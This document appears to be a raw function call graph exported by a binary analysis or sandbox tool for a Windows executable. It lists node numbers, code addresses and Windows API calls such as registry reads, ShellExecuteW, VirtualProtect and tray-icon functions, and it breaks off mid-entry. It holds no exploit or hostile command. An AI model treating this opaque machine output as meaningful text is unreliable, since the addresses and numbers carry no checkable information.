95967->95962 95970 5be937 95979 5be6f8 38 API calls 4 library calls 95970->95979 95971 5be91a 95977 5c27ec 26 API calls pre_c_initialization 95971->95977 95974 5be94e 95980 5be96c LeaveCriticalSection __fread_nolock 95974->95980 95976->95971 95977->95967 95978->95970 95979->95974 95980->95967 95982 596d91 95981->95982 95983 596d34 95981->95983 95984 5993b2 22 API calls 95982->95984 95983->95982 95985 596d3f 95983->95985 95991 596d62 __fread_nolock 95984->95991 95986 5d4c9d 95985->95986 95987 596d5a 95985->95987 95988 5afddb 22 API calls 95986->95988 95995 596f34 22 API calls 95987->95995 95990 5d4ca7 95988->95990 95992 5afe0b 22 API calls 95990->95992 95991->95684 95993 5d4cda 95992->95993 95994->95699 95995->95991 95997 5963b6 __fread_nolock 95996->95997 95998 596382 95996->95998 95997->95710 95998->95997 95999 5d4a82 95998->95999 96000 5963a9 95998->96000 96001 5afddb 22 API calls 95999->96001 96002 59a587 22 API calls 96000->96002 96003 5d4a91 96001->96003 96002->95997 96004 5afe0b 22 API calls 96003->96004 96005 5d4ac5 __fread_nolock 96004->96005 96006->95711 96007->95753 96008->95755 96043 5be4e8 96009->96043 96011 60275d 96011->95775 96012->95805 96014 5bdbc1 96013->96014 96020 5bdbdd 96013->96020 96015 5bdbcd 96014->96015 96016 5bdbe3 96014->96016 96014->96020 96060 5bf2d9 20 API calls __dosmaperr 96015->96060 96057 5bd9cc 96016->96057 96019 5bdbd2 96061 5c27ec 26 API calls pre_c_initialization 96019->96061 96020->95817 96023 5be684 __FrameHandler3::FrameUnwindToState 96022->96023 96024 5be6aa 96023->96024 96025 5be695 96023->96025 96034 5be6a5 __fread_nolock 96024->96034 96217 5b918d EnterCriticalSection 96024->96217 96234 5bf2d9 20 API calls __dosmaperr 96025->96234 96028 5be69a 96235 5c27ec 26 API calls pre_c_initialization 96028->96235 96029 5be6c6 96218 5be602 96029->96218 96032 5be6d1 96236 5be6ee LeaveCriticalSection __fread_nolock 96032->96236 96034->95808 96036 603013 96035->96036 96037 602fff SetFileTime CloseHandle 96035->96037 96036->95787 96037->96036 96038->95782 96039->95788 96040->95796 96041->95796 96042->95821 96046 5be469 96043->96046 96045 5be505 96045->96011 96047 5be478 96046->96047 96048 5be48c 96046->96048 96054 5bf2d9 20 API calls __dosmaperr 96047->96054 96053 5be488 __alldvrm 96048->96053 96056 5c333f 11 API calls 2 library calls 96048->96056 96050 5be47d 96055 5c27ec 26 API calls pre_c_initialization 96050->96055 96053->96045 96054->96050 96055->96053 96056->96053 96062 5bd97b 96057->96062 96059 5bd9f0 96059->96020 96060->96019 96061->96020 96063 5bd987 __FrameHandler3::FrameUnwindToState 96062->96063 96070 5b918d EnterCriticalSection 96063->96070 96065 5bd995 96071 5bd9f4 96065->96071 96069 5bd9b3 __fread_nolock 96069->96059 96070->96065 96079 5c49a1 96071->96079 96077 5bd9a2 96078 5bd9c0 LeaveCriticalSection __fread_nolock 96077->96078 96078->96069 96100 5bd955 96079->96100 96081 5c49b0 96107 5cf89b 96081->96107 96083 5bda09 96088 5bda3a 96083->96088 96084 5c49b6 96084->96083 96116 5c3820 21 API calls 2 library calls 96084->96116 96086 5c4a15 96087 5c29c8 _free 20 API calls 96086->96087 96087->96083 96090 5bda4c 96088->96090 96095 5bda24 96088->96095 96089 5bda5a 96147 5bf2d9 20 API calls __dosmaperr 96089->96147 96090->96089 96092 5bda85 __fread_nolock 96090->96092 96090->96095 96092->96095 96097 5bd955 __fread_nolock 26 API calls 96092->96097 96122 5c59be 96092->96122 96149 5bdc0b 96092->96149 96093 5bda5f 96148 5c27ec 26 API calls pre_c_initialization 96093->96148 96099 5c4a56 62 API calls 96095->96099 96097->96092 96099->96077 96101 5bd961 96100->96101 96102 5bd976 96100->96102 96117 5bf2d9 20 API calls __dosmaperr 96101->96117 96102->96081 96104 5bd966 96118 5c27ec 26 API calls pre_c_initialization 96104->96118 96106 5bd971 96106->96081 96108 5cf8a8 96107->96108 96109 5cf8b5 96107->96109 96119 5bf2d9 20 API calls __dosmaperr 96108->96119 96112 5cf8c1 96109->96112 96120 5bf2d9 20 API calls __dosmaperr 96109->96120 96111 5cf8ad 96111->96084 96112->96084 96114 5cf8e2 96121 5c27ec 26 API calls pre_c_initialization 96114->96121 96116->96086 96117->96104 96118->96106 96119->96111 96120->96114 96121->96111 96123 5c59ca __FrameHandler3::FrameUnwindToState 96122->96123 96124 5c59d2 96123->96124 96127 5c59ea 96123->96127 96209 5bf2c6 20 API calls __dosmaperr 96124->96209 96126 5c5a88 96214 5bf2c6 20 API calls __dosmaperr 96126->96214 96127->96126 96132 5c5a1f 96127->96132 96128 5c59d7 96210 5bf2d9 20 API calls __dosmaperr 96128->96210 96131 5c5a8d 96215 5bf2d9 20 API calls __dosmaperr 96131->96215 96155 5c5147 EnterCriticalSection 96132->96155 96135 5c5a95 96216 5c27ec 26 API calls pre_c_initialization 96135->96216 96136 5c5a25 96138 5c5a56 96136->96138 96139 5c5a41 96136->96139 96156 5c5aa9 96138->96156 96211 5bf2d9 20 API calls __dosmaperr 96139->96211 96141 5c59df __fread_nolock 96141->96092 96143 5c5a46 96212 5bf2c6 20 API calls __dosmaperr 96143->96212 96144 5c5a51 96213 5c5a80 LeaveCriticalSection __wsopen_s 96144->96213 96147->96093 96148->96095 96150 5bdc1f 96149->96150 96151 5bdc23 96149->96151 96150->96092 96151->96150 96152 5bd955 __fread_nolock 26 API calls 96151->96152 96153 5bdc43 96152->96153 96154 5c59be __wsopen_s 62 API calls 96153->96154 96154->96150 96155->96136 96157 5c5ad7 96156->96157 96204 5c5ad0 96156->96204 96158 5c5afa 96157->96158 96159 5c5adb 96157->96159 96163 5c5b4b 96158->96163 96164 5c5b2e 96158->96164 96160 5bf2c6 __dosmaperr 20 API calls 96159->96160 96162 5c5ae0 96160->96162 96161 5b0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96165 5c5cb1 96161->96165 96166 5bf2d9 _free 20 API calls 96162->96166 96167 5c5b61 96163->96167 96170 5c9424 __wsopen_s 28 API calls 96163->96170 96168 5bf2c6 __dosmaperr 20 API calls 96164->96168 96165->96144 96169 5c5ae7 96166->96169 96171 5c564e __wsopen_s 39 API calls 96167->96171 96172 5c5b33 96168->96172 96173 5c27ec pre_c_initialization 26 API calls 96169->96173 96170->96167 96174 5c5b6a 96171->96174 96175 5bf2d9 _free 20 API calls 96172->96175 96173->96204 96176 5c5b6f 96174->96176 96177 5c5ba8 96174->96177 96178 5c5b3b 96175->96178 96181 5c5b95 96176->96181 96182 5c5b73 96176->96182 96179 5c5bbc 96177->96179 96180 5c5c02 WriteFile 96177->96180 96183 5c27ec pre_c_initialization 26 API calls 96178->96183 96184 5c5bc4 96179->96184 96185 5c5bf2 96179->96185 96186 5c5c25 GetLastError 96180->96186 96193 5c5b8b 96180->96193 96187 5c542e __wsopen_s 45 API calls 96181->96187 96190 5c55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 96182->96190 96192 5c5c69 96182->96192 96183->96204 96188 5c5bc9 96184->96188 96189 5c5be2 96184->96189 96191 5c56c4 __wsopen_s 7 API calls 96185->96191 96186->96193 96187->96193 96188->96192 96195 5c5bd2 96188->96195 96196 5c5891 __wsopen_s 8 API calls 96189->96196 96190->96193 96197 5c5be0 96191->96197 96194 5bf2d9 _free 20 API calls 96192->96194 96192->96204 96193->96192 96199 5c5c45 96193->96199 96193->96204 96198 5c5c8e 96194->96198 96200 5c57a3 __wsopen_s 7 API calls 96195->96200 96196->96197 96197->96193 96201 5bf2c6 __dosmaperr 20 API calls 96198->96201 96202 5c5c4c 96199->96202 96203 5c5c60 96199->96203 96200->96197 96201->96204 96205 5bf2d9 _free 20 API calls 96202->96205 96206 5bf2a3 __dosmaperr 20 API calls 96203->96206 96204->96161 96207 5c5c51 96205->96207 96206->96204 96208 5bf2c6 __dosmaperr 20 API calls 96207->96208 96208->96204 96209->96128 96210->96141 96211->96143 96212->96144 96213->96141 96214->96131 96215->96135 96216->96141 96217->96029 96219 5be60f 96218->96219 96220 5be624 96218->96220 96256 5bf2d9 20 API calls __dosmaperr 96219->96256 96223 5bdc0b 62 API calls 96220->96223 96232 5be61f 96220->96232 96222 5be614 96257 5c27ec 26 API calls pre_c_initialization 96222->96257 96225 5be638 96223->96225 96237 5c4d7a 96225->96237 96228 5bd955 __fread_nolock 26 API calls 96229 5be646 96228->96229 96241 5c862f 96229->96241 96232->96032 96233 5c29c8 _free 20 API calls 96233->96232 96234->96028 96235->96034 96236->96034 96238 5be640 96237->96238 96239 5c4d90 96237->96239 96238->96228 96239->96238 96240 5c29c8 _free 20 API calls 96239->96240 96240->96238 96242 5c863e 96241->96242 96243 5c8653 96241->96243 96261 5bf2c6 20 API calls __dosmaperr 96242->96261 96245 5c868e 96243->96245 96249 5c867a 96243->96249 96263 5bf2c6 20 API calls __dosmaperr 96245->96263 96246 5c8643 96262 5bf2d9 20 API calls __dosmaperr 96246->96262 96258 5c8607 96249->96258 96250 5c8693 96264 5bf2d9 20 API calls __dosmaperr 96250->96264 96253 5c869b 96265 5c27ec 26 API calls pre_c_initialization 96253->96265 96255 5be64c 96255->96232 96255->96233 96256->96222 96257->96232 96266 5c8585 96258->96266 96260 5c862b 96260->96255 96261->96246 96262->96255 96263->96250 96264->96253 96265->96255 96267 5c8591 __FrameHandler3::FrameUnwindToState 96266->96267 96277 5c5147 EnterCriticalSection 96267->96277 96269 5c859f 96270 5c85c6 96269->96270 96271 5c85d1 96269->96271 96278 5c86ae 96270->96278 96293 5bf2d9 20 API calls __dosmaperr 96271->96293 96274 5c85cc 96294 5c85fb LeaveCriticalSection __wsopen_s 96274->96294 96276 5c85ee __fread_nolock 96276->96260 96277->96269 96295 5c53c4 96278->96295 96280 5c86c4 96308 5c5333 21 API calls 3 library calls 96280->96308 96281 5c86be 96281->96280 96283 5c86f6 96281->96283 96286 5c53c4 __wsopen_s 26 API calls 96281->96286 96283->96280 96284 5c53c4 __wsopen_s 26 API calls 96283->96284 96287 5c8702 CloseHandle 96284->96287 96285 5c871c 96288 5c873e 96285->96288 96309 5bf2a3 20 API calls 2 library calls 96285->96309 96289 5c86ed 96286->96289 96287->96280 96290 5c870e GetLastError 96287->96290 96288->96274 96292 5c53c4 __wsopen_s 26 API calls 96289->96292 96290->96280 96292->96283 96293->96274 96294->96276 96296 5c53e6 96295->96296 96297 5c53d1 96295->96297 96299 5bf2c6 __dosmaperr 20 API calls 96296->96299 96301 5c540b 96296->96301 96298 5bf2c6 __dosmaperr 20 API calls 96297->96298 96300 5c53d6 96298->96300 96302 5c5416 96299->96302 96303 5bf2d9 _free 20 API calls 96300->96303 96301->96281 96305 5bf2d9 _free 20 API calls 96302->96305 96304 5c53de 96303->96304 96304->96281 96306 5c541e 96305->96306 96307 5c27ec pre_c_initialization 26 API calls 96306->96307 96307->96304 96308->96285 96309->96288 96339 596270 96310->96339 96312 599fd2 96345 59a4a1 96312->96345 96314 599fec 96314->95574 96317 5df7c4 96357 5f96e2 84 API calls __wsopen_s 96317->96357 96318 5df699 96326 5afddb 22 API calls 96318->96326 96319 59a405 96319->96314 96358 5f96e2 84 API calls __wsopen_s 96319->96358 96321 59a4a1 22 API calls 96337 599eb5 96321->96337 96324 59a6c3 22 API calls 96324->96337 96325 5df7d2 96327 59a4a1 22 API calls 96325->96327 96328 5df754 96326->96328 96329 5df7e8 96327->96329 96330 5afe0b 22 API calls 96328->96330 96329->96314 96331 59a12c __fread_nolock 96330->96331 96331->96317 96331->96319 96333 59a587 22 API calls 96333->96337 96334 59aec9 22 API calls 96335 59a0db CharUpperBuffW 96334->96335 96353 59a673 22 API calls 96335->96353 96337->96312 96337->96317 96337->96318 96337->96319 96337->96321 96337->96324 96337->96331 96337->96333 96337->96334 96344 594573 41 API calls _wcslen 96337->96344 96354 5948c8 23 API calls 96337->96354 96355 5949bd 22 API calls __fread_nolock 96337->96355 96356 59a673 22 API calls 96337->96356 96338->95578 96340 5afe0b 22 API calls 96339->96340 96341 596295 96340->96341 96342 5afddb 22 API calls 96341->96342 96343 5962a3 96342->96343 96343->96337 96344->96337 96346 59a52b 96345->96346 96352 59a4b1 __fread_nolock 96345->96352 96349 5afe0b 22 API calls 96346->96349 96347 5afddb 22 API calls 96348 59a4b8 96347->96348 96350 59a4d6 96348->96350 96351 5afddb 22 API calls 96348->96351 96349->96352 96350->96314 96351->96350 96352->96347 96353->96337 96354->96337 96355->96337 96356->96337 96357->96325 96358->96314 96360 600f7e 96359->96360 96375 601097 96359->96375 96361 600fcb 96360->96361 96362 600f9e 96360->96362 96364 600fe2 96360->96364 96363 5afe0b 22 API calls 96361->96363 96362->96361 96366 600fb2 96362->96366 96370 600fc0 __fread_nolock 96363->96370 96367 5afe0b 22 API calls 96364->96367 96376 600fff 96364->96376 96365 601026 96369 5afe0b 22 API calls 96365->96369 96368 5afe0b 22 API calls 96366->96368 96367->96376 96368->96370 96371 60102c 96369->96371 96372 5afddb 22 API calls 96370->96372 96378 5af1d8 22 API calls 96371->96378 96372->96375 96374 601038 96379 5af6c9 24 API calls 96374->96379 96375->95580 96376->96365 96376->96366 96376->96370 96378->96374 96379->96370 96381 597510 53 API calls 96380->96381 96382 617f90 96381->96382 96406 617fd5 ISource 96382->96406 96418 618cd3 96382->96418 96384 618281 96385 61844f 96384->96385 96390 61828f 96384->96390 96459 618ee4 60 API calls 96385->96459 96388 61845e 96388->96390 96391 61846a 96388->96391 96389 597510 53 API calls 96408 618049 96389->96408 96431 617e86 96390->96431 96391->96406 96396 6182c8 96446 5afc70 96396->96446 96399 618302 96453 5963eb 22 API calls 96399->96453 96400 6182e8 96452 60359c 82 API calls __wsopen_s 96400->96452 96403 6182f3 GetCurrentProcess TerminateProcess 96403->96399 96404 618311 96454 596a50 22 API calls 96404->96454 96406->95585 96407 61832a 96416 618352 96407->96416 96455 5a04f0 22 API calls 96407->96455 96408->96384 96408->96389 96408->96406 96450 5f417d 22 API calls __fread_nolock 96408->96450 96451 61851d 42 API calls _strftime 96408->96451 96409 6184c5 96409->96406 96414 6184d9 FreeLibrary 96409->96414 96411 618341 96456 618b7b 75 API calls 96411->96456 96414->96406 96416->96409 96457 5a04f0 22 API calls 96416->96457 96458 59aceb 23 API calls ISource 96416->96458 96460 618b7b 75 API calls 96416->96460 96419 59aec9 22 API calls 96418->96419 96420 618cee CharLowerBuffW 96419->96420 96461 5f8e54 96420->96461 96424 59a961 22 API calls 96425 618d2a 96424->96425 96426 596d25 22 API calls 96425->96426 96427 618d3e 96426->96427 96428 5993b2 22 API calls 96427->96428 96430 618d48 _wcslen 96428->96430 96429 618e5e _wcslen 96429->96408 96430->96429 96468 61851d 42 API calls _strftime 96430->96468 96432 617ea1 96431->96432 96433 617eec 96431->96433 96434 5afe0b 22 API calls 96432->96434 96437 619096 96433->96437 96435 617ec3 96434->96435 96435->96433 96436 5afddb 22 API calls 96435->96436 96436->96435 96438 6192ab ISource 96437->96438 96445 6190ba _strcat _wcslen 96437->96445 96438->96396 96439 59b6b5 39 API calls 96439->96445 96440 59b567 39 API calls 96440->96445 96441 59b38f 39 API calls 96441->96445 96442 597510 53 API calls 96442->96445 96443 5bea0c 21 API calls ___std_exception_copy 96443->96445 96445->96438 96445->96439 96445->96440 96445->96441 96445->96442 96445->96443 96471 5fefae 24 API calls _wcslen 96445->96471 96448 5afc85 96446->96448 96447 5afd1d VirtualProtect 96449 5afceb 96447->96449 96448->96447 96448->96449 96449->96399 96449->96400 96450->96408 96451->96408 96452->96403 96453->96404 96454->96407 96455->96411 96456->96416 96457->96416 96458->96416 96459->96388 96460->96416 96462 5f8e74 _wcslen 96461->96462 96463 5f8f63 96462->96463 96465 5f8f68 96462->96465 96466 5f8ea9 96462->96466 96463->96424 96463->96430 96465->96463 96470 5ace60 41 API calls 96465->96470 96466->96463 96469 5ace60 41 API calls 96466->96469 96468->96429 96469->96466 96470->96465 96471->96445 96472 5a0b9d 96473 5a0ba6 __fread_nolock 96472->96473 96474 597510 53 API calls 96473->96474 96475 5e5cb8 96473->96475 96478 5a0bf7 96473->96478 96479 5afddb 22 API calls 96473->96479 96482 5a0847 __fread_nolock 96473->96482 96483 5afe0b 22 API calls 96473->96483 96474->96473 96484 594a88 22 API calls __fread_nolock 96475->96484 96477 5e5cc4 96481 59a8c7 22 API calls 96477->96481 96477->96482 96480 59a587 22 API calls 96478->96480 96479->96473 96480->96482 96481->96482 96483->96473 96484->96477 96485 591033 96490 594c91 96485->96490 96489 591042 96491 59a961 22 API calls 96490->96491 96492 594cff 96491->96492 96498 593af0 96492->96498 96495 594d9c 96496 591038 96495->96496 96501 5951f7 22 API calls __fread_nolock 96495->96501 96497 5b00a3 29 API calls __onexit 96496->96497 96497->96489 96502 593b1c 96498->96502 96501->96495 96503 593b29 96502->96503 96504 593b0f 96502->96504 96503->96504 96505 593b30 RegOpenKeyExW 96503->96505 96504->96495 96505->96504 96506 593b4a RegQueryValueExW 96505->96506 96507 593b6b 96506->96507 96508 593b80 RegCloseKey 96506->96508 96507->96508 96508->96504 96509 5e3f75 96520 5aceb1 96509->96520 96511 5e3f8b 96513 5e4006 96511->96513 96587 5ae300 23 API calls 96511->96587 96529 59bf40 96513->96529 96516 5e4052 96518 5e4a88 96516->96518 96589 60359c 82 API calls __wsopen_s 96516->96589 96517 5e3fe6 96517->96516 96588 601abf 22 API calls 96517->96588 96521 5acebf 96520->96521 96522 5aced2 96520->96522 96590 59aceb 23 API calls ISource 96521->96590 96524 5aced7 96522->96524 96525 5acf05 96522->96525 96527 5afddb 22 API calls 96524->96527 96591 59aceb 23 API calls ISource 96525->96591 96528 5acec9 96527->96528 96528->96511 96592 59adf0 96529->96592 96531 59bf9d 96532 59bfa9 96531->96532 96533 5e04b6 96531->96533 96534 5e04c6 96532->96534 96535 59c01e 96532->96535 96611 60359c 82 API calls __wsopen_s 96533->96611 96612 60359c 82 API calls __wsopen_s 96534->96612 96597 59ac91 96535->96597 96539 5f7120 22 API calls 96584 59c039 ISource __fread_nolock 96539->96584 96540 59c7da 96544 5afe0b 22 API calls 96540->96544 96549 59c808 __fread_nolock 96544->96549 96546 5e04f5 96550 5e055a 96546->96550 96613 5ad217 235 API calls 96546->96613 96553 5afe0b 22 API calls 96549->96553 96573 59c603 96550->96573 96614 60359c 82 API calls __wsopen_s 96550->96614 96551 59af8a 22 API calls 96551->96584 96552 5e091a 96624 603209 23 API calls 96552->96624 96585 59c350 ISource __fread_nolock 96553->96585 96554 5afddb 22 API calls 96554->96584 96557 59ec40 235 API calls 96557->96584 96558 5e08a5 96559 59ec40 235 API calls 96558->96559 96561 5e08cf 96559->96561 96561->96573 96622 59a81b 41 API calls 96561->96622 96562 5e0591 96615 60359c 82 API calls __wsopen_s 96562->96615 96563 5e08f6 96623 60359c 82 API calls __wsopen_s 96563->96623 96569 59c237 96570 59c253 96569->96570 96572 59a8c7 22 API calls 96569->96572 96574 5e0976 96570->96574 96578 59c297 ISource 96570->96578 96571 5afe0b 22 API calls 96571->96584 96572->96570 96573->96516 96625 59aceb 23 API calls ISource 96574->96625 96577 5e09bf 96577->96573 96626 60359c 82 API calls __wsopen_s 96577->96626 96578->96577 96608 59aceb 23 API calls ISource 96578->96608 96580 59c335 96580->96577 96581 59c342 96580->96581 96609 59a704 22 API calls ISource 96581->96609 96582 59bbe0 40 API calls 96582->96584 96584->96539 96584->96540 96584->96546 96584->96549 96584->96550 96584->96551 96584->96552 96584->96554 96584->96557 96584->96558 96584->96562 96584->96563 96584->96569 96584->96571 96584->96573 96584->96577 96584->96582 96601 59ad81 96584->96601 96616 5f7099 22 API calls __fread_nolock 96584->96616 96617 615745 54 API calls _wcslen 96584->96617 96618 5aaa42 22 API calls ISource 96584->96618 96619 5ff05c 40 API calls 96584->96619 96620 59a993 41 API calls 96584->96620 96621 59aceb 23 API calls ISource 96584->96621 96586 59c3ac 96585->96586 96610 5ace17 22 API calls ISource 96585->96610 96586->96516 96587->96517 96588->96513 96589->96518 96590->96528 96591->96528 96593 59ae01 96592->96593 96596 59ae1c ISource 96592->96596 96594 59aec9 22 API calls 96593->96594 96595 59ae09 CharUpperBuffW 96594->96595 96595->96596 96596->96531 96598 59acae 96597->96598 96599 59acd1 96598->96599 96627 60359c 82 API calls __wsopen_s 96598->96627 96599->96584 96602 5dfadb 96601->96602 96603 59ad92 96601->96603 96604 5afddb 22 API calls 96603->96604 96605 59ad99 96604->96605 96628 59adcd 96605->96628 96608->96580 96609->96585 96610->96585 96611->96534 96612->96573 96613->96550 96614->96573 96615->96573 96616->96584 96617->96584 96618->96584 96619->96584 96620->96584 96621->96584 96622->96563 96623->96573 96624->96569 96625->96577 96626->96573 96627->96599 96632 59addd 96628->96632 96629 59adb6 96629->96584 96630 5afddb 22 API calls 96630->96632 96631 59a961 22 API calls 96631->96632 96632->96629 96632->96630 96632->96631 96633 59a8c7 22 API calls 96632->96633 96634 59adcd 22 API calls 96632->96634 96633->96632 96634->96632 96635 592e37 96636 59a961 22 API calls 96635->96636 96637 592e4d 96636->96637 96714 594ae3 96637->96714 96639 592e6b 96640 593a5a 24 API calls 96639->96640 96641 592e7f 96640->96641 96642 599cb3 22 API calls 96641->96642 96643 592e8c 96642->96643 96644 594ecb 94 API calls 96643->96644 96645 592ea5 96644->96645 96646 592ead 96645->96646 96647 5d2cb0 96645->96647 96650 59a8c7 22 API calls 96646->96650 96744 602cf9 96647->96744 96649 5d2cc3 96651 5d2ccf 96649->96651 96653 594f39 68 API calls 96649->96653 96652 592ec3 96650->96652 96655 594f39 68 API calls 96651->96655 96728 596f88 22 API calls 96652->96728 96653->96651 96657 5d2ce5 96655->96657 96656 592ecf 96658 599cb3 22 API calls 96656->96658 96770 593084 22 API calls 96657->96770 96659 592edc 96658->96659 96729 59a81b 41 API calls 96659->96729 96662 592eec 96664 599cb3 22 API calls 96662->96664 96663 5d2d02 96771 593084 22 API calls 96663->96771 96666 592f12 96664->96666 96730 59a81b 41 API calls 96666->96730 96667 5d2d1e 96669 593a5a 24 API calls 96667->96669 96671 5d2d44 96669->96671 96670 592f21 96673 59a961 22 API calls 96670->96673 96772 593084 22 API calls 96671->96772 96676 592f3f 96673->96676 96674 5d2d50 96675 59a8c7 22 API calls 96674->96675 96677 5d2d5e 96675->96677 96731 593084 22 API calls 96676->96731 96773 593084 22 API calls 96677->96773 96680 592f4b 96732 5b4a28 40 API calls 3 library calls 96680->96732 96681 5d2d6d 96685 59a8c7 22 API calls 96681->96685 96683 592f59 96683->96657 96684 592f63 96683->96684 96733 5b4a28 40 API calls 3 library calls 96684->96733 96687 5d2d83 96685->96687 96774 593084 22 API calls 96687->96774 96688 592f6e 96688->96663 96690 592f78 96688->96690 96734 5b4a28 40 API calls 3 library calls 96690->96734 96691 5d2d90 96693 592f83 96693->96667 96694 592f8d 96693->96694 96735 5b4a28 40 API calls 3 library calls 96694->96735 96696 592f98 96697 592fdc 96696->96697 96736 593084 22 API calls 96696->96736 96697->96681 96698 592fe8 96697->96698 96698->96691 96738 5963eb 22 API calls 96698->96738 96700 592fbf 96702 59a8c7 22 API calls 96700->96702 96705 592fcd 96702->96705 96703 592ff8 96739 596a50 22 API calls 96703->96739 96737 593084 22 API calls 96705->96737 96706 593006 96740 5970b0 23 API calls 96706->96740 96711 593021 96712 593065 96711->96712 96741 596f88 22 API calls 96711->96741 96742 5970b0 23 API calls 96711->96742 96743 593084 22 API calls 96711->96743 96715 594af0 __wsopen_s 96714->96715 96716 596b57 22 API calls 96715->96716 96717 594b22 96715->96717 96716->96717 96718 594c6d 22 API calls 96717->96718 96722 594b58 96717->96722 96718->96717 96719 599cb3 22 API calls 96721 594c52 96719->96721 96720 599cb3 22 API calls 96720->96722 96723 59515f 22 API calls 96721->96723 96722->96720 96725 59515f 22 API calls 96722->96725 96726 594c29 96722->96726 96727 594c6d 22 API calls 96722->96727 96724 594c5e 96723->96724 96724->96639 96725->96722 96726->96719 96726->96724 96727->96722 96728->96656 96729->96662 96730->96670 96731->96680 96732->96683 96733->96688 96734->96693 96735->96696 96736->96700 96737->96697 96738->96703 96739->96706 96740->96711 96741->96711 96742->96711 96743->96711 96745 602d15 96744->96745 96746 59511f 64 API calls 96745->96746 96747 602d29 96746->96747 96775 602e66 75 API calls 96747->96775 96749 602d3b 96750 5950f5 40 API calls 96749->96750 96768 602d3f 96749->96768 96751 602d56 96750->96751 96752 5950f5 40 API calls 96751->96752 96753 602d66 96752->96753 96754 5950f5 40 API calls 96753->96754 96755 602d81 96754->96755 96756 5950f5 40 API calls 96755->96756 96757 602d9c 96756->96757 96758 59511f 64 API calls 96757->96758 96759 602db3 96758->96759 96760 5bea0c ___std_exception_copy 21 API calls 96759->96760 96761 602dba 96760->96761 96762 5bea0c ___std_exception_copy 21 API calls 96761->96762 96763 602dc4 96762->96763 96764 5950f5 40 API calls 96763->96764 96765 602dd8 96764->96765 96776 6028fe 27 API calls 96765->96776 96767 602dee 96767->96768 96777 6022ce 79 API calls 96767->96777 96768->96649 96770->96663 96771->96667 96772->96674 96773->96681 96774->96691 96775->96749 96776->96767 96777->96768 96778 593156 96781 593170 96778->96781 96782 593187 96781->96782 96783 5931eb 96782->96783 96784 59318c 96782->96784 96821 5931e9 96782->96821 96786 5d2dfb 96783->96786 96787 5931f1 96783->96787 96788 593199 96784->96788 96789 593265 PostQuitMessage 96784->96789 96785 5931d0 DefWindowProcW 96813 59316a 96785->96813 96837 5918e2 10 API calls 96786->96837 96790 5931f8 96787->96790 96791 59321d SetTimer RegisterWindowMessageW 96787->96791 96793 5d2e7c 96788->96793 96794 5931a4 96788->96794 96789->96813 96795 5d2d9c 96790->96795 96796 593201 KillTimer 96790->96796 96798 593246 CreatePopupMenu 96791->96798 96791->96813 96842 5fbf30 34 API calls ___scrt_fastfail 96793->96842 96799 5d2e68 96794->96799 96800 5931ae 96794->96800 96808 5d2dd7 MoveWindow 96795->96808 96809 5d2da1 96795->96809 96833 5930f2 Shell_NotifyIconW ___scrt_fastfail 96796->96833 96797 5d2e1c 96838 5ae499 42 API calls 96797->96838 96798->96813 96826 5fc161 96799->96826 96805 5d2e4d 96800->96805 96806 5931b9 96800->96806 96805->96785 96841 5f0ad7 22 API calls 96805->96841 96814 5931c4 96806->96814 96815 593253 96806->96815 96807 5d2e8e 96807->96785 96807->96813 96808->96813 96810 5d2da7 96809->96810 96811 5d2dc6 SetFocus 96809->96811 96810->96814 96816 5d2db0 96810->96816 96811->96813 96812 593214 96834 593c50 DeleteObject DestroyWindow 96812->96834 96814->96785 96839 5930f2 Shell_NotifyIconW ___scrt_fastfail 96814->96839 96835 59326f 44 API calls ___scrt_fastfail 96815->96835 96836 5918e2 10 API calls 96816->96836 96821->96785 96822 593263 96822->96813 96824 5d2e41 96840 593837 49 API calls ___scrt_fastfail 96824->96840 96827 5fc179 ___scrt_fastfail 96826->96827 96828 5fc276 96826->96828 96843 593923 96827->96843 96828->96813 96830 5fc25f KillTimer SetTimer 96830->96828 96831 5fc1a0 96831->96830 96832 5fc251 Shell_NotifyIconW 96831->96832 96832->96830 96833->96812 96834->96813 96835->96822 96836->96813 96837->96797 96838->96814 96839->96824 96840->96821 96841->96821 96842->96807 96844 59393f 96843->96844 96863 593a13 96843->96863 96845 596270 22 API calls 96844->96845 96846 59394d 96845->96846 96847 59395a 96846->96847 96848 5d3393 LoadStringW 96846->96848 96849 596b57 22 API calls 96847->96849 96850 5d33ad 96848->96850 96851 59396f 96849->96851 96854 59a8c7 22 API calls 96850->96854 96859 593994 ___scrt_fastfail 96850->96859 96852 5d33c9 96851->96852 96853 59397c 96851->96853 96856 596350 22 API calls 96852->96856 96853->96850 96855 593986 96853->96855 96854->96859 96857 596350 22 API calls 96855->96857 96858 5d33d7 96856->96858 96857->96859 96858->96859 96860 5933c6 22 API calls 96858->96860 96861 5939f9 Shell_NotifyIconW 96859->96861 96862 5d33f9 96860->96862 96861->96863 96864 5933c6 22 API calls 96862->96864 96863->96831 96864->96859 96865 591cad SystemParametersInfoW 96866 5d2ba5 96867 5d2baf 96866->96867 96868 592b25 96866->96868 96870 593a5a 24 API calls 96867->96870 96894 592b83 7 API calls 96868->96894 96872 5d2bb8 96870->96872 96873 599cb3 22 API calls 96872->96873 96875 5d2bc6 96873->96875 96877 5d2bce 96875->96877 96878 5d2bf5 96875->96878 96876 592b2f 96882 592b44 96876->96882 96898 593837 49 API calls ___scrt_fastfail 96876->96898 96879 5933c6 22 API calls 96877->96879 96881 5933c6 22 API calls 96878->96881 96883 5d2bd9 96879->96883 96884 5d2bf1 GetForegroundWindow ShellExecuteW 96881->96884 96887 592b5f 96882->96887 96899 5930f2 Shell_NotifyIconW ___scrt_fastfail 96882->96899 96885 596350 22 API calls 96883->96885 96889 5d2c26 96884->96889 96888 5d2be7 96885->96888 96891 592b66 SetCurrentDirectoryW 96887->96891 96892 5933c6 22 API calls 96888->96892 96889->96887 96893 592b7a 96891->96893 96892->96884 96900 592cd4 7 API calls 96894->96900 96896 592b2a 96897 592c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96896->96897 96897->96876 96898->96882 96899->96887 96900->96896 96901 592de3 96902 592df0 __wsopen_s 96901->96902 96903 592e09 96902->96903 96904 5d2c2b ___scrt_fastfail 96902->96904 96905 593aa2 23 API calls 96903->96905 96907 5d2c47 GetOpenFileNameW 96904->96907 96906 592e12 96905->96906 96917 592da5 96906->96917 96909 5d2c96 96907->96909 96910 596b57 22 API calls 96909->96910 96912 5d2cab 96910->96912 96912->96912 96914 592e27 96935 5944a8 96914->96935 96918 5d1f50 __wsopen_s 96917->96918 96919 592db2 GetLongPathNameW 96918->96919 96920 596b57 22 API 